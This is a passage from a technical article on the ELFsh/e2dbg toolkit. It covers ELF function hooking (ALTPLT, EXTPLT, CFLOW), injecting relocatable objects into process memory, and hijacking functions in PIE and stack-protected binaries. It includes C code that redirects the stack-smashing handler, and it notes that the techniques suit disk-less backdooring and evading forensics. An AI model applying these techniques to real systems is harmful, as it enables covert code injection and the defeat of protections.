+			  ALTGOT section. See MIPS altplt handler
+			  in libelfsh/mips32.c
+		   ]
+		   ELSE IF [ ARCH is IA32 ]
+		   [
+			* Reencode the first PLT entry using GOT - ALTGOT
+			  address difference (so we relocate into ALTGOT
+			  instead of GOT)
+		   ]
+		]
+		
+		IF [ ARCH is MIPS ]
+		   * Inject OLD symbol on current PLT entry
+		ELSE
+		   * Inject OLD symbol on current ALTPLT entry
+
+		IF [ ARCH is ALPHA ]
+		   * Shift relocation entry pointing at current location
+		
+		IF [ ARCH is IA32 ]
+		   * Reencode PLT and ALTPLT current entry
+	  ]   
+
+	  4/ SWITCH on ELF architecture
+	  [
+	       MIPS:
+	       IA32:
+		 * Change DT_PLTGOT entry from GOT to ALTGOT address
+		 * Shift GOT related relocation
+	       SPARC:
+	         * Change DT_PLTGOT entry from PLT to ALTPLT address
+		 * Shift PLT related relocations
+	  ]
+
+	  
+
+	  On MIPS, there is no relocation tables inside ET_EXEC binaries.
+	  If we want to shift the relocations that make reference to GOT 
+	  inside the MIPS code, we need to fingerprint such code patterns
+	  so that we fix them using the ALTGOT - GOT difference. They are
+	  easily found since the needed patches are always on the same 
+	  binary instructions pattern :
+
+	  3c1c0000        lui     gp,0x0
+	  279c0000        addiu   gp,gp,0
+	  
+	  The zero fields in those instructions should be patched at
+	  linking time when they match HI16 and LO16 MIPS relocations. 
+	  However this information is not available in a table for 
+	  ET_EXEC files, so we had to find them back in the binary code. 
+	  It way easier to do this on RISC architectures since all 
+	  instructions are the same length so false positives are very 
+	  unlikely to happen. Once we found all those patterns, we fix 
+	  them using the ALTGOT-GOT difference in the relocatable fields.
+	  Of course, we wont change ALL references to GOT inside the 
+	  code, because that would result in just moving the GOT without
+	  performing any hijack. We just fix those references in the 
+	  first 0x100 bytes of .text, and in .init, .fini, that means 
+	  only the references at the reserved GOT entries (filled with 
+	  dl-resolve virtual address and linkmap address). That way, we 
+	  make the original code use the ALTGOT section when accessing 
+	  reserved entries (since they have been runtime relocated in 
+	  ALTGOT and not GOT) and the original GOT entries when accessing
+	  the function entries (so that we can hijack functions using 
+	  GOT modification).
+
+
+	  EXTPLT algorithm
+	 +----------------+
+	  
+	  The EXTPLT algorithm fits well in the previous algorithm. We 
+	  just needed to add 2 steps in the previous listing : 
+
+	  	  
+	  Step 2 BIS : Insert the EXTPLT (copy of PLT) section on 
+		       supported architectures.
+
+	  Step 5     : Mirror (and extend) dynamic linking sections on 
+		       supported architectures. Let's give more details
+		       about this algorithm implemented in 
+		       libelfsh/extplt.c.
+
+	  * Mirror .rel.got (.rel.dyn) and .rel.plt sections after BSS, 
+	  with a double sized mirror sections. Those 2 sections needs to
+	  stay adjacent in memory so that EXTPLT works on ET_DYN objects 
+	  as well.
+
+	  * Update DT_REL and DT_JMPREL entries in .dynamic
+
+	  * Mirror .dynsym and .dynstr sections with a double size
+	  
+	  * Update DT_SYMTAB and DT_STRTAB entries in .dynamic
+
+	  Once those operations are done, we have room in all the various
+	  dynamic linking oriented sections and we can add on-demand 
+	  dynamic symbols, symbols names, and relocation entry necessary 
+	  for adding extra PLT entries in the EXTPLT section.
+
+	  Then, each time we encounter a unknown symbol in the process of 
+	  relocating a ET_REL object inside a ET_EXEC or ET_DYN object, 
+	  we can use the REQUESTPLT algorithm, as implemented in 
+	  elfsh_request_pltent() function in the libelfsh/extplt.c file :
+
+	  * Check room in EXTPLT, RELPLT, DYNSYM, DYNSTR, and 
+	  ALTGOT sections.
+
+	  * Initialize ALTGOT entry to EXTPLT allocated new entry.
+
+	  * Encode EXTPLT entry for using the ALTGOT entry.
+
+	  * Insert relocation entry inside .elfsh.relplt for ALTGOT 
+	  new entry.
+
+	  * Add relocation entry size to DT_PLTRELSZ entry value in 
+	  .dynamic section.
+
+	  * Insert missing symbol in .elfsh.dynsym, with name inserted in 
+	  .elfsh.dynstr section.
+
+	  * Add symbol name length to DT_STRSZ entry value in .dynamic 
+	  section.
+
+	  This algorithm is called from the main ET_REL injection and 
+	  relocation algorithm each time the ET_REL object use an unknown
+	  function whoose symbol is not present in the host file. The 
+	  new ET_REL injection algorithm is given at the end of the 
+	  constrained debugging part of the article.	  
+
+
+	  CFLOW algorithm
+	 +----------------+
+
+	 This technique is implemented using an architecture dependant 
+	 backend but the global algorithm stays the same for all 
+	 architectures :
+
+	 - Create .elfsh.hooks sections (only 1 time)
+	 - Find number of bytes aligned on instruction size :
+		* Using libasm on IA32
+		* Manually on RISC machines
+	 - Insert HOOK entry on demand (see CFLOW dump for format)
+	 - Insert JMP to hook entry in hijacked function prolog
+	 - Align JUMP hook on instruction size with NOP in hijacked prolog
+	 - Insert hook_funcname and old_funcname symbols in hook entry for
+	   beeing able to call back the original function.
+
+
+	 The technique is PaX safe since it does not need any runtime 
+	 bytes restoration step. We can hook the address of our choice 
+	 using the CFLOW technique, however executing the original bytes 
+	 in the hook entry instead of their original place will not work 
+	 when placing hooks on relative branching instructions. Indeed, 
+	 relatives branching will be resolved to a wrong virtual address 
+	 if we execute their opcodes at the wrong place (inside 
+	 .elfsh.hooks instead of their original place) inside the 
+	 process. Remember this when placing CFLOW hooks : it is not 
+	 intended to hook relative branch instructions.
+
+
+
+-------[ V. Constrained Debugging
+
+
+	 In nowadays environment, hardened binaries are usually
+	 of type ET_DYN. We had to support this kind of injection
+	 since it allows for library files modification as much
+	 powerful as the the executable files modification. Moreover
+	 some distribution comes with a default binary set compiled
+	 in ET_DYN, such as hardened gentoo.
+
+	 Another improvement that we wanted to be done is the ET_REL
+	 relocation in memory. The algorithm for it is the same than
+	 the ondisk injection, but this time the disk is not changed
+	 so it reduces forensics evidences like in [12]. It is believed 
+	 that this kind of injection can be used in exploits and direct
+	 process backdooring without touching the hard disk. Evil eh ?
+
+	 We are aware of another implementation of the ET_REL injection	
+	 into memory [10]. Ours supports a wider range of architecture and
+	 couples with the EXTPLT technique directly in memory, which
+	 was not previously implemented to our knowledge.
+
+	 A last technique that we wanted to develop was about extending
+	 and debugging static executables. We developed this new technique
+	 that we called EXTSTATIC algorithm. It allows for static
+	 injections by taking parts of libc.a when functions or code is
+	 missing. The same ET_REL injection algorithm is used except
+	 that more than one relocatable file taken from libc.a is 
+	 injected at a time using a recursive dependency algorithm.
+
+
+---[ A. ET_REL relocation in memory				
+
+
+	 Because we want to be able to provide a handler for breakpoints
+	 as they are specified, we allow for direct mapping of an ET_REL
+	 object into memory. We use extra mmap zone for this, always
+	 taking care that it does not break PaX : we do not map any zone
+	 beeing both executable and writable.
+
+	 In e2dbg, breakpoints can be implemented in 2 ways. Either an
+	 architecture specific opcode (like 0xCC on IA32) is used on the
+	 desired redirected access, or the CFLOW/ALTPLT primitives can be
+	 used in runtime. In the second case, the mprotect system
+	 call must be used to be able to modify code at runtime. However
+	 we may be able to get rid of mprotect soon for runtime injections
+	 as the CFLOW techniques improves for beeing both static and
+	 runtime PaX safe.
+
+	 Let's look at some simple binary that does just use printf and
+	 and puts to understand more those concepts:
+
+
+ ========= BEGIN DUMP 26 =========
+
+ elfsh@WTH $ ./a.out
+ [host] main argc 1
+ [host] argv[0] is : ./a.out
+
+ First_printf test
+ First_puts
+ Second_printf test
+ Second_puts
+ LEGIT FUNC
+ legit func (test) !
+ ========= END DUMP 26 =========
+
+
+	   We use a small elfsh script as e2dbg so that it creates
+	   another file with the debugger injected inside it, using
+	   regular elfsh techniques. Let's look at it :
+
+
+
+ ========= BEGIN DUMP 27 =========	  
+ elfsh@WTH $ cat inject_e2dbg.esh
+ #!../../vm/elfsh
+ load a.out
+ set 1.dynamic[08].val 0x2			# entry for DT_DEBUG
+ set 1.dynamic[08].tag DT_NEEDED
+ redir main e2dbg_run
+ save a.out_e2dbg
+ ========= END DUMP 27 =========
+
+
+	   We then execute the modified binary.
+
+
+ ========= BEGIN DUMP 28 =========
+
+ elfsh@WTH $ ./aout_e2dbg
+
+
+         The Embedded ELF Debugger 0.65 (32 bits built) .::.
+
+         .::. This software is under the General Public License V.2
+         .::. Please visit http://www.gnu.org
+
+ [*] Sun Jul 31 16:24:00 2005 - New object ./a.out_e2dbg loaded
+ [*] Sun Jul 31 16:24:00 2005 - New object /lib/tls/libc.so.6 loaded
+ [*] Sun Jul 31 16:24:00 2005 - New object ./ibc.so.6 loaded
+ [*] Sun Jul 31 16:24:00 2005 - New object /lib/ld-linux.so.2 loaded
+ [*] Sun Jul 31 16:24:00 2005 - New object /lib/libelfsh.so loaded
+ [*] Sun Jul 31 16:24:00 2005 - New object /lib/libreadline.so.5 loaded
+ [*] Sun Jul 31 16:24:00 2005 - New object /lib/libtermcap.so.2 loaded
+ [*] Sun Jul 31 16:24:00 2005 - New object /lib/libdl.so.2 loaded
+ [*] Sun Jul 31 16:24:00 2005 - New object /lib/libncurses.so.5 loaded
+
+ (e2dbg-0.65) quit
+
+         [..: Embedded ELF Debugger returns to the grave :...]
+
+ [e2dbg_run] returning to 0x08045139
+ [host] main argc 1
+ [host] argv[0] is : ./a.out_e2dbg
+
+ First_printf test
+ First_puts
+ Second_printf test
+ Second_puts
+ LEGIT FUNC
+ legit func (test) !
+
+ elfsh@WTH $
+
+========= END DUMP 28 =========
+
+
+	   Okay, that was easy. What if we want to do something more
+	   interresting like ET_REL object injection into memory. We
+	   will make use of the profile command so that we can see
+	   the autoprofiling feature of e2dbg. This command is always
+	   useful to learn more about the internals of the debugger, 
+	   and for internal debugging problems that may occur while
+	   developping it.
+
+	   Our cheap function calls pattern matching makes the output 
+	   more understandable than a raw print of profiling information
+	   and took only a few hours to implement using the 
+	   ELFSH_PROFILE_{OUT,ERR,ROUT} macros in libelfsh-internals.h
+	   and libelfsh/error.c 
+
+	   We will also print the linkmap list. The linkmap first fields
+	   are OS independant. There are a lot of other internal fields
+	   that we do not display here but a lot of information could
+	   be grabbed from there as well.
+
+	   See the stuff in action :
+	   
+
+ ========= BEGIN DUMP 29 =========
+
+ elfsh@WTH $ ./a.out_e2dbg
+
+         The Embedded ELF Debugger 0.65 (32 bits built) .::.
+
+         .::. This software is under the General Public License V.2
+         .::. Please visit http://www.gnu.org 
+
+ [*] Sun Jul 31 16:12:48 2005 - New object ./a.out_e2dbg loaded
+ [*] Sun Jul 31 16:12:48 2005 - New object /lib/tls/libc.so.6 loaded
+ [*] Sun Jul 31 16:12:48 2005 - New object ./ibc.so.6 loaded
+ [*] Sun Jul 31 16:12:48 2005 - New object /lib/ld-linux.so.2 loaded
+ [*] Sun Jul 31 16:12:48 2005 - New object /lib/libelfsh.so loaded
+ [*] Sun Jul 31 16:12:48 2005 - New object /lib/libreadline.so.5 loaded
+ [*] Sun Jul 31 16:12:48 2005 - New object /lib/libtermcap.so.2 loaded
+ [*] Sun Jul 31 16:12:48 2005 - New object /lib/libdl.so.2 loaded
+ [*] Sun Jul 31 16:12:48 2005 - New object /lib/libncurses.so.5 loaded
+
+ (e2dbg-0.65) linkmap 
+
+ .::. Linkmap entries .::.
+ [01] addr : 0x00000000 dyn : 0x080497D4 -
+ [02] addr : 0x00000000 dyn : 0xFFFFE590 -
+ [03] addr : 0xB7E73000 dyn : 0xB7F9AD3C - /lib/tls/libc.so.6
+ [04] addr : 0xB7E26000 dyn : 0xB7E6F01C - ./ibc.so.6
+ [05] addr : 0xB7FB9000 dyn : 0xB7FCFF14 - /lib/ld-linux.so.2
+ [06] addr : 0xB7DF3000 dyn : 0xB7E24018 - /lib/libelfsh.so
+ [07] addr : 0xB7DC6000 dyn : 0xB7DEE46C - /lib/libreadline.so.5
+ [08] addr : 0xB7DC2000 dyn : 0xB7DC5BB4 - /lib/libtermcap.so.2
+ [09] addr : 0xB7DBE000 dyn : 0xB7DC0EEC - /lib/libdl.so.2
+ [10] addr : 0xB7D7C000 dyn : 0xB7DBB1C0 - /lib/libncurses.so.5
+
+ (e2dbg-0.65) list
+
+ .::. Working files .::.
+ [001] Sun Jul 31 16:24:00 2005  D ID: 9 /lib/libncurses.so.5
+ [002] Sun Jul 31 16:24:00 2005  D ID: 8 /lib/libdl.so.2
+ [003] Sun Jul 31 16:24:00 2005  D ID: 7 /lib/libtermcap.so.2
+ [004] Sun Jul 31 16:24:00 2005  D ID: 6 /lib/libreadline.so.5
+ [005] Sun Jul 31 16:24:00 2005  D ID: 5 /lib/libelfsh.so
+ [006] Sun Jul 31 16:24:00 2005  D ID: 4 /lib/ld-linux.so.2
+ [007] Sun Jul 31 16:24:00 2005  D ID: 3 ./ibc.so.6
+ [008] Sun Jul 31 16:24:00 2005  D ID: 2 /lib/tls/libc.so.6
+ [009] Sun Jul 31 16:24:00 2005 *D ID: 1 ./a.out_e2dbg
+
+ .::. ELFsh modules .::.
+ [*] No loaded module
+
+ (e2dbg-0.65) source ./etrelmem.esh
+
+ ~load myputs.o
+
+ [*] Sun Jul 31 16:13:32 2005 - New object myputs.o loaded
+
+ [!!] Loaded file is not the linkmap, switching to STATIC mode
+
+ ~switch 1
+
+ [*] Switched on object 1 (./a.out_e2dbg)
+
+ ~mode dynamic
+
+ [*] e2dbg is now in DYNAMIC mode
+
+ ~reladd 1 10
+
+ [*] ET_REL myputs.o injected succesfully in ET_EXEC ./a.out_e2dbg
+
+ ~profile
+         .:: Profiling enable
+
+ + <vm_print_actual@loop.c:38>
+ ~redir puts myputs
+ + <vm_implicit@implicit.c:91>
+ + <cmd_hijack@fcthijack.c:19>
+ + <elfsh_get_metasym_by_name@sym_common.c:283>
+ + <elfsh_get_dynsymbol_by_name@dynsym.c:255>
+ + <elfsh_get_dynsymtab@dynsym.c:87>
+ + <elfsh_get_raw@section.c:691>
+ [P] --[ <elfsh_get_raw@section.c:691>
+ [P] --- Last 1 function(s) recalled 1 time(s) ---
+ + <elfsh_get_dynsymbol_name@dynsym.c:17>
+ [W]     <elfsh_get_dynsymbol_by_name@dynsym.c:274>      Symbol not found
+ [P] --[ <elfsh_get_raw@section.c:691>
+ [P] --[ <elfsh_get_dynsymbol_name@dynsym.c:17>
+ [P] --- Last 2 function(s) recalled 12 time(s) ---
+ + <elfsh_get_symbol_by_name@symbol.c:236>
+ + <elfsh_get_symtab@symbol.c:110>
+ + <elfsh_get_symbol_name@symbol.c:20>
+ [P] --[ <elfsh_get_symbol_name@symbol.c:20>
+ [P] --- Last 1 function(s) recalled 114 time(s) ---
+ + <elfsh_hijack_function_by_name@hijack.c:25>
+ + <elfsh_setup_hooks@hooks.c:199>
+ + <elfsh_get_pagesize@hooks.c:783>
+ + <elfsh_get_archtype@hooks.c:624>
+ + <elfsh_get_arch@elf.c:179>
+ + <elfsh_copy_plt@altplt.c:525>
+ + <elfsh_static_file@elf.c:491>
+ + <elfsh_get_segment_by_type@pht.c:215>
+ + <elfsh_get_pht@pht.c:364>
+ + <elfsh_get_segment_type@pht.c:174>
+ [P] --[ <elfsh_get_segment_type@pht.c:174>
+ [P] --- Last 1 function(s) recalled 4 time(s) ---
+ + <elfsh_get_arch@elf.c:179>
+ [P] --[ <elfsh_get_arch@elf.c:179>
+ [P] --- Last 1 function(s) recalled 1 time(s) ---
+ + <elfsh_relink_plt@altplt.c:121>
+ + <elfsh_get_archtype@hooks.c:624>
+ [P] --[ <elfsh_get_arch@elf.c:179>
+ [P] --[ <elfsh_relink_plt@altplt.c:121>
+ [P] --[ <elfsh_get_archtype@hooks.c:624>
+ [P] --- Last 3 function(s) recalled 1 time(s) ---
+ + <elfsh_get_elftype@hooks.c:662>
+ + <elfsh_get_objtype@elf.c:204>
+ + <elfsh_get_ostype@hooks.c:709>
+ + <elfsh_get_real_ostype@hooks.c:679>
+ + <elfsh_get_interp@interp.c:41>
+ + <elfsh_get_raw@section.c:691>
+ [P] --[ <elfsh_get_raw@section.c:691>
+ [P] --- Last 1 function(s) recalled 1 time(s) ---
+ + <elfsh_get_section_by_name@section.c:168>
+ + <elfsh_get_section_name@sht.c:474>
+ [P] --[ <elfsh_get_section_name@sht.c:474>
+ [P] --- Last 1 function(s) recalled 1 time(s) ---
+ + <elfsh_get_symbol_by_name@symbol.c:236>
+ + <elfsh_get_symtab@symbol.c:110>
+ + <elfsh_get_symbol_name@symbol.c:20>
+ [W]     <elfsh_get_symbol_by_name@symbol.c:253>         Symbol not found
+ [P] --[ <elfsh_get_symbol_name@symbol.c:20>
+ [P] --- Last 1 function(s) recalled 114 time(s) ---
+ + <elfsh_is_pltentry@plt.c:73>
+ [W]     <elfsh_is_pltentry@plt.c:77>               Invalid NULL parameter
+ + <elfsh_get_dynsymbol_by_name@dynsym.c:255>
+ + <elfsh_get_dynsymtab@dynsym.c:87>
+ + <elfsh_get_raw@section.c:691>
+ [P] --[ <elfsh_get_raw@section.c:691>
+ [P] --- Last 1 function(s) recalled 1 time(s) ---
+ + <elfsh_get_dynsymbol_name@dynsym.c:17>
+ [P] --[ <elfsh_is_pltentry@plt.c:73>
+ [P] --[ <elfsh_get_dynsymbol_by_name@dynsym.c:255>
+ [P] --[ <elfsh_get_dynsymtab@dynsym.c:87>
+ [P] --[ <elfsh_get_raw@section.c:691>
+ [P] --[ <elfsh_get_dynsymbol_name@dynsym.c:17>
+ [P] --- Last 5 function(s) recalled 1 time(s) ---
+ + <elfsh_get_plt@plt.c:16>
+ + <elfsh_is_plt@plt.c:49>
+ + <elfsh_get_section_name@sht.c:474>
+ + <elfsh_is_altplt@plt.c:62>
+ [P] --[ <elfsh_is_plt@plt.c:49>
+ [P] --[ <elfsh_get_section_name@sht.c:474>
+ [P] --[ <elfsh_is_altplt@plt.c:62>
+ [P] --- Last 3 function(s) recalled 3 time(s) ---
+ + <elfsh_get_anonymous_section@section.c:334>
+ + <elfsh_get_raw@section.c:691>
+ [P] --[ <elfsh_is_plt@plt.c:49>
+ [P] --[ <elfsh_get_section_name@sht.c:474>
+ [P] --[ <elfsh_is_altplt@plt.c:62>
+ [P] --[ <elfsh_get_anonymous_section@section.c:334>
+ [P] --[ <elfsh_get_raw@section.c:691>
+ [P] --- Last 5 function(s) recalled 44 time(s) ---
+ + <elfsh_get_arch@elf.c:179>
+ [P] --[ <elfsh_get_arch@elf.c:179>
+ [P] --- Last 1 function(s) recalled 1 time(s) ---
+ + <elfsh_hijack_plt_ia32@ia32.c:258>
+ + <elfsh_get_foffset_from_vaddr@raw.c:85>
+ + <elfsh_get_pltentsz@plt.c:94>
+ [P] --[ <elfsh_get_arch@elf.c:179>
+ [P] --[ <elfsh_hijack_plt_ia32@ia32.c:258>
+ [P] --[ <elfsh_get_foffset_from_vaddr@raw.c:85>
+ [P] --[ <elfsh_get_pltentsz@plt.c:94>
+ [P] --- Last 4 function(s) recalled 1 time(s) ---
+ + <elfsh_munprotect@runtime.c:97>
+ + <elfsh_get_parent_section@section.c:380>
+ + <elfsh_get_parent_segment@pht.c:304>
+ + <elfsh_segment_is_readable@pht.c:14>
+ + <elfsh_segment_is_writable@pht.c:21>
+ + <elfsh_segment_is_executable@pht.c:28>
+ + <elfsh_raw_write@raw.c:22>
+ + <elfsh_get_parent_section_by_foffset@section.c:416>
+ + <elfsh_get_sht@sht.c:159>
+ + <elfsh_get_section_type@sht.c:887>
+ + <elfsh_get_anonymous_section@section.c:334>
+ + <elfsh_get_raw@section.c:691>
+ + <elfsh_raw_write@raw.c:22>
+ + <elfsh_get_parent_section_by_foffset@section.c:416>
+ + <elfsh_get_sht@sht.c:159>
+ + <elfsh_get_section_type@sht.c:887>
+ + <elfsh_get_anonymous_section@section.c:334>
+ + <elfsh_get_raw@section.c:691>
+ + <elfsh_get_pltentsz@plt.c:94>
+ + <elfsh_get_arch@elf.c:179>
+ + <elfsh_mprotect@runtime.c:135>
+
+ [*] Function puts redirected to addr 0xB7FB6000 <myputs>
+
+ + <vm_print_actual@loop.c:38>
+ ~profile
+ + <vm_implicit@implicit.c:91>
+         .:: Profiling disable
+
+
+ [*] ./etrelmem.esh sourcing -OK-
+
+ (e2dbg-0.65) continue
+
+
+         [..: Embedded ELF Debugger returns to the grave :...]
+
+ [e2dbg_run] returning to 0x08045139
+ [host] main argc 1
+ [host] argv[0] is : ./a.out_e2dbg
+
+ First_printf test
+ Hijacked puts !!! arg = First_puts
+ First_puts
+ Second_printf test
+ Hijacked puts !!! arg = Second_puts
+ Second_puts
+ Hijacked puts !!! arg = LEGIT FUNC
+ LEGIT FUNC
+ legit func (test) !
+ elfsh@WTH $
+
+ ========= END DUMP 29 =========
+
+
+	  Really cool. We hijacked 2 functions (puts and legit_func) using
+	  the 2 different (ALTPLT and CFLOW) techniques. For this, we
+	  did not have to inject an additional ET_REL file inside the
+	  ET_EXEC host, but we directly injected the hook module inside
+	  memory using mmap.
+
+	  We could have printed the SHT and PHT as well just after the
+	  ET_REL injection into memory. We keep track of all mapping
+	  when we inject such relocatable objects, so that we can 
+	  eventually unmap them in the future or remap them later :
+
+
+ ========= BEGIN DUMP 30 =========
+	  
+ (e2dbg-0.65) s
+
+ [SECTION HEADER TABLE .::. SHT is not stripped]
+ [Object ./a.out_e2dbg]
+
+ [000] 0x00000000 -------                           foff:00000 size:00308
+ [001] 0x08045134 a-x---- .elfsh.hooks              foff:00308 size:00015
+ [002] 0x08046134 a-x---- .elfsh.extplt             foff:04404 size:00032
+ [003] 0x08047134 a-x---- .elfsh.altplt             foff:08500 size:04096
+ [004] 0x08048134 a------ .interp                   foff:12596 size:00019
+ [005] 0x08048148 a------ .note.ABI-tag             foff:12616 size:00032
+ [006] 0x08048168 a------ .hash                     foff:12648 size:00064
+ [007] 0x080481A8 a------ .dynsym                   foff:12712 size:00176
+ [008] 0x08048258 a------ .dynstr                   foff:12888 size:00112
+ [009] 0x080482C8 a------ .gnu.version              foff:13000 size:00022
+ [010] 0x080482E0 a------ .gnu.version_r            foff:13024 size:00032
+ [011] 0x08048300 a------ .rel.dyn                  foff:13056 size:00016
+ [012] 0x08048310 a------ .rel.plt                  foff:13072 size:00056
+ [013] 0x08048348 a-x---- .init                     foff:13128 size:00023
+ [014] 0x08048360 a-x---- .plt                      foff:13152 size:00128
+ [015] 0x08048400 a-x---- .text                     foff:13312 size:00800
+ [016] 0x08048720 a-x---- .fini                     foff:14112 size:00027
+ [017] 0x0804873C a------ .rodata                   foff:14140 size:00185
+ [018] 0x080487F8 a------ .eh_frame                 foff:14328 size:00004
+ [019] 0x080497FC aw----- .ctors                    foff:14332 size:00008
+ [020] 0x08049804 aw----- .dtors                    foff:14340 size:00008
+ [021] 0x0804980C aw----- .jcr                      foff:14348 size:00004
+ [022] 0x08049810 aw----- .dynamic                  foff:14352 size:00200
+ [023] 0x080498D8 aw----- .got                      foff:14552 size:00004
+ [024] 0x080498DC aw----- .got.plt                  foff:14556 size:00040
+ [025] 0x08049904 aw----- .data                     foff:14596 size:00012
+ [026] 0x08049910 aw----- .bss                      foff:14608 size:00008
+ [027] 0x08049918 aw----- .elfsh.altgot             foff:14616 size:00044
+ [028] 0x08049968 aw----- .elfsh.dynsym             foff:14696 size:00192
+ [029] 0x08049AC8 aw----- .elfsh.dynstr             foff:15048 size:00122
+ [030] 0x08049BA8 aw----- .elfsh.reldyn             foff:15272 size:00016
+ [031] 0x08049BB8 aw----- .elfsh.relplt             foff:15288 size:00064
+ [032] 0x00000000 ------- .comment                  foff:15400 size:00665
+ [033] 0x00000000 ------- .debug_aranges            foff:16072 size:00120
+ [034] 0x00000000 ------- .debug_pubnames           foff:16192 size:00042
+ [035] 0x00000000 ------- .debug_info               foff:16234 size:06904
+ [036] 0x00000000 ------- .debug_abbrev             foff:23138 size:00503
+ [037] 0x00000000 ------- .debug_line               foff:23641 size:00967
+ [038] 0x00000000 ------- .debug_frame              foff:24608 size:00076
+ [039] 0x00000000 ---ms-- .debug_str                foff:24684 size:08075
+ [040] 0x00000000 ------- .debug_macinfo            foff:32759 size:29295
+ [041] 0x00000000 ------- .shstrtab                 foff:62054 size:00496
+ [042] 0x00000000 ------- .symtab                   foff:64473 size:02256
+ [043] 0x00000000 ------- .strtab                   foff:66729 size:01665
+ [044] 0x40019000 aw----- myputs.o.bss              foff:68394 size:04096
+ [045] 0x00000000 ------- .elfsh.rpht               foff:72493 size:04096
+ [046] 0x4001A000 a-x---- myputs.o.text             foff:76589 size:04096
+ [047] 0x4001B000 a--ms-- myputs.o.rodata.str1.1    foff:80685 size:04096
+
+ (e2dbg-0.65) p
+
+ [Program Header Table .::. PHT]
+ [Object ./a.out_e2dbg]
+
+ [00] 0x08045034 -> 0x08045134 r-x memsz(00256) filesz(00256)
+ [01] 0x08048134 -> 0x08048147 r-- memsz(00019) filesz(00019)
+ [02] 0x08045000 -> 0x080487FC r-x memsz(14332) filesz(14332)
+ [03] 0x080497FC -> 0x08049C30 rw- memsz(01076) filesz(01068)
+ [04] 0x08049810 -> 0x080498D8 rw- memsz(00200) filesz(00200)
+ [05] 0x08048148 -> 0x08048168 r-- memsz(00032) filesz(00032)
+ [06] 0x00000000 -> 0x00000000 rw- memsz(00000) filesz(00000)
+ [07] 0x00000000 -> 0x00000000 --- memsz(00000) filesz(00000)
+
+ [SHT correlation]
+ [Object ./a.out_e2dbg]
+
+ [*] SHT is not stripped 
+ 
+ [00] PT_PHDR    
+ [01] PT_INTERP         .interp 
+ [02] PT_LOAD           .elfsh.hooks .elfsh.extplt .elfsh.altplt .interp 
+			.note.ABI-tag .hash .dynsym .dynstr .gnu.version 
+			.gnu.version_r .rel.dyn .rel.plt .init .plt 
+			.text .fini .rodata .eh_frame 
+ [03] PT_LOAD           .ctors .dtors .jcr .dynamic .got .got.plt .data 
+			.bss .elfsh.altgot .elfsh.dynsym .elfsh.dynstr 
+			.elfsh.reldyn .elfsh.relplt 
+ [04] PT_DYNAMIC        .dynamic 
+ [05] PT_NOTE           .note.ABI-tag 
+ [06] PT_GNU_STACK 
+ [07] PT_PAX_FLAGS 
+
+ [Runtime Program Header Table .::. RPHT]
+ [Object ./a.out_e2dbg]
+
+ [00] 0x40019000 -> 0x4001A000 rw- memsz(4096) filesz(4096)
+ [01] 0x4001A000 -> 0x4001B000 r-x memsz(4096) filesz(4096)
+ [02] 0x4001B000 -> 0x4001C000 r-x memsz(4096) filesz(4096)
+
+ [SHT correlation]
+ [Object ./a.out_e2dbg]
+
+ [*] SHT is not stripped 
+ 
+ [00] PT_LOAD           myputs.o.bss 
+ [01] PT_LOAD           myputs.o.text 
+ [02] PT_LOAD           myputs.o.rodata.str1.1 
+
+ (e2dbg-0.65) 
+
+
+ ========= BEGIN DUMP 30 =========
+
+
+
+	   Our algorithm is not really optimized since it allocates 
+	   a new PT_LOAD by section. Here, we created a new table RPHT 
+	   (Runtime PHT) which handle the list of all runtime injected
+	   pages. This table has no legal existance in the ELF file, 
+	   but that avoid to extend the real PHT with additional
+	   runtime memory areas. The technique does not break PaX
+	   since all zones are allocated using the strict necessary
+	   rights. However, if you want to redirect existing functions
+	   on the newly injected functions from myputs.o, then you
+	   will have to change some code in runtime, and then it
+	   becomes necessary to disable mprotect option to avoid
+	   breaking PaX. 
+
+
+
+---[ B. ET_REL relocation into ET_DYN				
+
+
+
+	  We ported the ET_REL injection and the EXTPLT technique to 
+	  ET_DYN files. The biggest difference is that ET_DYN files have 
+	  a relative address space ondisk. Of course, stripped binaries 
+	  have no effect on our algorithms and we dont need any	      
+	  non-mandatory information such as debug sections or anything
+	  (it may be obvious but some peoples really asked this).
+
+	  Let's see what happens on this ET_DYN host file:
+
+
+ ========= BEGIN DUMP 31 =========
+
+ elfsh@WTH $ file main
+ main: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), 
+ stripped
+
+ elfsh@WTH $ ./main
+ 0x800008c8 main(argc=0xbfa238d0, argv=0xbfa2387c, envp=0xbfa23878, 
+	         auxv=0xbfa23874) __guard=0xb7ef4148
+ ssp-all (Stack) Triggering an overflow by copying [20] of data into [10]
+ of space
+ main: stack smashing attack in function main()
+ Aborted
+
+ elfsh@WTH $ ./main AAAAA
+ 0x800008c8 main(argc=0xbf898e40, argv=0xbf898dec, envp=0xbf898de8, 
+	         auxv=0xbf898de4) __guard=0xb7f6a148
+ ssp-all (Stack) Copying [5] of data into [10] of space
+
+ elfsh@WTH $ ./main AAAAAAAAAAAAAAAAAAAAAAAAAAA
+ 0x800008c8 main(argc=0xbfd3c8e0, argv=0xbfd3c88c, envp=0xbfd3c888, 
+                 auxv=0xbfd3c884) __guard=0xb7f0b148
+ ssp-all (Stack) Copying [27] of data into [10] of space
+ main: stack smashing attack in function main()
+ Aborted
+
+ ========= END DUMP 31 =========
+
+
+	   For the sake of fun, we decided to study in priority  the
+	   hardened gentoo binaries [11] . Those comes with PIE (Position
+	   Independant Executable) and SSP (Stack Smashing Protection)
+	   built in. It does not change a line of our algorithm. Here
+	   are some tests done on a stack smashing protected binary
+	   with an overflow in the first parameter, triggering the
+	   stack smashing handler. We will redirect that handler
+	   to show that it is a normal function that use classical
+	   PLT mechanisms.
+
+	   This is the code that we are going to inject :
+	   
+
+ ========= BEGIN DUMP 32 =========
+
+ elfsh@WTH $ cat simple.c
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <unistd.h>
+
+ int     fake_main(int argc, char **argv)
+ {
+   old_printf("I am the main function, I have %d argc and my "
+  	      "argv is %08X yupeelala \n",
+              argc, argv); 
+
+   write(1, "fake_main is calling write ! \n", 30);
+
+   old_main(argc, argv);
+
+   return (0);
+ }
+
+ char*   fake_strcpy(char *dst, char *src)
+ {
+   printf("The fucker wants to copy %s at address %08X \n", src, dst);
+   return ((char *) old_strcpy(dst, src));
+ }
+
+ void    fake_stack_smash_handler(char func[], int damaged)
+ {
+   static int i = 0;
+   printf("calling printf from stack smashing handler %u\n", i++);
+   if (i>3)
+     old___stack_smash_handler(func, damaged);
+   else
+     printf("Same player play again [damaged = %08X] \n", damaged);
+   printf("A second (%d) printf from the handler \n", 2);
+ }
+
+ int fake_libc_start_main(void *one, void *two, void *three, void *four, 
